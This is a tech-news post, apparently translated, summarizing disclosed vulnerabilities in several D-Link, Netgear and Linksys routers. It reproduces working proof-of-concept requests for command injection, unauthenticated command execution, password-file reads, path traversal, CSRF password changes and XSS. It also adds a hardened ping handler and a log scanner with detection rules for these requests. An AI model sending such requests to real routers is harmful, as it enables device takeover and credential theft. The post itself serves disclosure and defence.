
The next zero-day vulnerabilities in various routers

It seems the start of the year has not gone well for router manufacturers. Just today I reported on critical vulnerabilities in routers from various manufacturers related to unsafe handling of the UPnP protocol, and here is more news on the same topic. This time the vulnerabilities are completely different. Equipment affected:



The vulnerabilities are quite different, but they have several things in common: one author, and a vendor's unwillingness to release a patch (according to the author).
D'Link DIR-615
It is claimed that the problem exists in hardware revision H1, firmware version 8.04 of September 4, 2012 and 8.04 of January 18, 2013. However, I could not find these versions on the vendor's official website.

Execution of arbitrary OS commands on the router


An authorized user can execute an arbitrary command on the device by sending a GET request in which the command is passed in the ping_ipaddr parameter.

Example:

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr=


The output of the command is returned in the body of the HTTP response:

HTTP/1.0 200 OK
Pragma: no-cache
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript" src="common.js.htm"></script>
<script language="javascript">
CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS});
var pingResult="Domain";
var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown";   <<==
var vctinfo= [
{ethport:'0', status:'0', rate:'0', dup:'0'},
{ethport:'1', status:'0', rate:'0', dup:'0'},
{ethport:'2', status:'0', rate:'0', dup:'0'},


Someone may ask: "What kind of vulnerability is this, if it is only possible for an authorized user?" Let me explain: an attacker can use social engineering and send the router's owner a specially crafted link.
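The root cause of the ping_ipaddr issue is the diagnostic page splicing an untrusted parameter into a shell command line. As an added example (not code from the original post or from D-Link's firmware), here is that vulnerable pattern next to a hardened handler that accepts only a literal IP address or a plain hostname and hands the value to ping as a single argv element, never through a shell; the firmware's real ping command and its option set are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

# The payload from the DIR-615 example above, URL-decoded: 1.1.1.1`uname -a`
INJECTED_TARGET = unquote("1.1.1.1%60uname%20-a%60")

# Hostname shape per RFC 1123: dot-separated labels of letters, digits and
# hyphens, each label starting and ending with a letter or digit. Requiring an
# alphanumeric first character also rules out option injection such as "-f".
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def build_ping_command_vulnerable(target: str) -> str:
    """The pattern the advisory implies (assumed command line): the parameter
    is spliced into a shell string, so backticks in it are command
    substitution and /bin/sh runs their contents before ping sees anything."""
    return f"ping -c 4 {target}"


def validated_ping_target(target: str) -> str:
    """Allow-list validation: a literal IPv4/IPv6 address or a plain hostname.
    Everything else (shell metacharacters, spaces, empty input, leading '-')
    is rejected with ValueError."""
    target = target.strip()
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"refusing to ping non-address target: {target!r}")


def build_ping_argv(target: str) -> list:
    """Hardened form: validate first, then build an argv list meant for
    subprocess.run(argv, shell=False). No shell parses the arguments, so the
    target can only ever be one argument to ping, never a second command."""
    return ["ping", "-c", "4", validated_ping_target(target)]
```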

Information disclosure

A GET request to an address of the form

 http://IP_/gconfig.htm 

returns:

var ModelName = 'DIR-615';
var systemName='DLINK-DIR615';
var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0}

Change password without entering old


It is enough to send a GET request with the following content:

 http://IP_/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615 


D-Link representatives were notified of the security problems but said there would be no fix, because in their opinion the problem is not in their equipment but in the browsers and in the users of their devices themselves.


DIR-600 / DIR 300 - HW rev B1
DIR-300 - vulnerable versions:
  • 2.12 dated 01/18/2012
  • 2.13 dated 07.11.2012


DIR-600 - vulnerable versions:
  • 2.12b02 dated 01/17/2012
  • 2.13b01 dated 07/11/2012
  • 2.14b01 dated 22/01/2013


Execution of arbitrary OS commands on the router


An unauthenticated user can execute an arbitrary command on the device by sending a request to command.php in which the command is passed in the cmd parameter.

Example: starting the telnetd server

Request:

POST /command.php HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.178.222/
Content-Length: 15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

cmd=telnetd;


Insecure storage of sensitive information



Passwords on the device are stored in clear text, without hashing:
# cat var/passwd
"admin" "test" "0"


The current user password can be viewed like this:

root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
"admin" "THESECRETPASS" "0"


Information disclosure


A request of the form

 http://Target-IP/DevInfo.txt 

returns:

HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267

Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: <snip>
WAN MAC: <snip>
WLAN MAC: <snip>

D-Link's response here was the same: representatives were notified of the security problems but said there would be no fix, because in their opinion the problem is not in their equipment but in the browsers and in the users of their devices themselves.



Netgear SPH200D
Vulnerable firmware versions:

Firmware Version: 1.0.4.80
Kernel Version: 4.1-18
Web Server Version: 1.5

Reading files on the device



An authorized user can read files on the device. A request to

 http://IP_/../../etc/passwd 

returns a response like:
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

root:x:0:0:root:/root:/bin/bash
demo:x:5000:100:Demo User:/home/demo:/bin/bash
nobody:x:65534:65534:Nobody:/htdocs:/bin/bash


Similarly, directory listings can be read:

/../../var/

HTTP/1.0 200 OK
Content-type: text/html
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0

<H1>Index of ../../var/</H1>
<p><a href="/../../var/.">.</a></p>
<p><a href="/../../var/..">..</a></p>
<p><a href="/../../var/.Skype">.Skype</a></p>
<p><a href="/../../var/jffs2">jffs2</a></p>
<p><a href="/../../var/htdocs">htdocs</a></p>
<p><a href="/../../var/cnxt">cnxt</a></p>
<p><a href="/../../var/ppp">ppp</a></p>
<p><a href="/../../var/conf">conf</a></p>
<p><a href="/../../var/bin">bin</a></p>
<p><a href="/../../var/usr">usr</a></p>
<p><a href="/../../var/tmp">tmp</a></p>


But since one has to be authorized on the device and has to receive the response to the request, it is not entirely clear how an attacker could take advantage of this.

Cross-site scripting


[image]

Presence of a "factory" account


By default, the device has an account with login service and password service. As I understand it, it cannot be changed by regular means.

The manufacturer was notified of the security issues in August 2012 but did not respond.



Linksys E1500 / E2500
Vulnerable firmware versions:
E1500:
  • v1.0.00 - build 9 - February 17, 2011
  • v1.0.04 - build 2 - March 8, 2012
  • v1.0.05 - build 1 - August 23, 2012


E2500:
  • v1.0.03


Execution of arbitrary OS commands on the router


An authorized user can execute an arbitrary command on the device by sending a GET request in which the command is passed in the ping_size parameter.

Example:
 http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip= 


Directory traversal


Example:

POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version


The response comes in the form:

HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012


Change password without entering old


An authorized user can change the password by sending a specially crafted POST request to the device:

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/Management.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0


CSRF attack for changing the password:


 http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 


Cross-site scripting


POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

Redirect to another site



POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 290

submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
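The request patterns described across all four advisories above are easy to recognise on the wire. As an added defender-side example (not from the original post or any of the advisories), here is a small Python scanner that flags them in HTTP request lines; the log lines are constructed samples in common log format, and since these embedded web servers keep no access log, the assumption is that request lines come from a proxy, IDS or packet capture in front of the router.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample request lines (common log format), not real traffic.
# The targets mirror the advisories above: DIR-615 ping injection and
# password change, DIR-600 command.php, Linksys CSRF password change,
# Netgear path traversal. Lines 2 and 7 are benign controls.
SAMPLE_LOG = """\
192.168.1.50 - - [20/Jan/2013:10:00:01 +0000] "GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= HTTP/1.1" 200 812
192.168.1.50 - - [20/Jan/2013:10:00:05 +0000] "GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=8.8.8.8&ping6_ipaddr= HTTP/1.1" 200 790
192.168.1.77 - - [20/Jan/2013:10:01:10 +0000] "GET /tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615 HTTP/1.1" 200 310
10.0.0.9 - - [20/Jan/2013:10:02:00 +0000] "POST /command.php HTTP/1.1" 200 44
192.168.1.77 - - [20/Jan/2013:10:03:00 +0000] "GET /apply.cgi?submit_button=Management&action=Apply&PasswdModify=1&http_passwd=password1&http_passwdConfirm=password1&remote_management=1 HTTP/1.1" 200 0
192.168.1.77 - - [20/Jan/2013:10:04:00 +0000] "GET /../../etc/passwd HTTP/1.0" 200 160
192.168.1.80 - - [20/Jan/2013:10:05:00 +0000] "GET /gconfig.htm HTTP/1.1" 200 210
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SHELL_META = re.compile(r"[`;|&$]")  # characters that matter to /bin/sh


def classify(method, target):
    """Return the names of the rules one request line matches."""
    path, _, query = target.partition("?")
    params = parse_qs(query, keep_blank_values=True)  # also percent-decodes
    hits = []
    if "/.." in unquote(path):
        hits.append("path-traversal")            # Netgear /../../etc/passwd
    if path.endswith("/command.php"):
        hits.append("dir600-command-php")        # unauthenticated cmd endpoint
    for name in ("ping_ipaddr", "ping_size", "cmd"):
        if any(SHELL_META.search(v) for v in params.get(name, [])):
            hits.append("shell-meta-in-" + name)  # DIR-615 / Linksys ping pages
    if method == "GET" and ("admin_password1" in params or "http_passwd" in params):
        hits.append("password-change-via-get")   # CSRF-able password change
    if any(".." in v for v in params.get("next_page", [])):
        hits.append("next-page-traversal")       # Linksys next_page=../../
    return hits


def scan(log_text):
    """Return (source IP, request target, rule hits) for suspicious lines."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (hits := classify(m["method"], m["target"])):
            findings.append((m["src"], m["target"], hits))
    return findings
```

The gconfig.htm and DevInfo.txt disclosures are deliberately not a rule: a single read is indistinguishable from normal admin use, so they are better handled by blocking management access from the WAN than by log matching.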




Links to the source:

  1. Multiple Vulnerabilities in D'Link DIR-600 and DIR-300 (rev B)
  2. Multiple Vulnerabilities in D'Link DIR-615
  3. Multiple Vulnerabilities in Netgear SPH200D [Update: 02/03/2013]
  4. Multiple Vulnerabilities in Linksys E1500 / E2500

Source: https://habr.com/ru/post/168683/

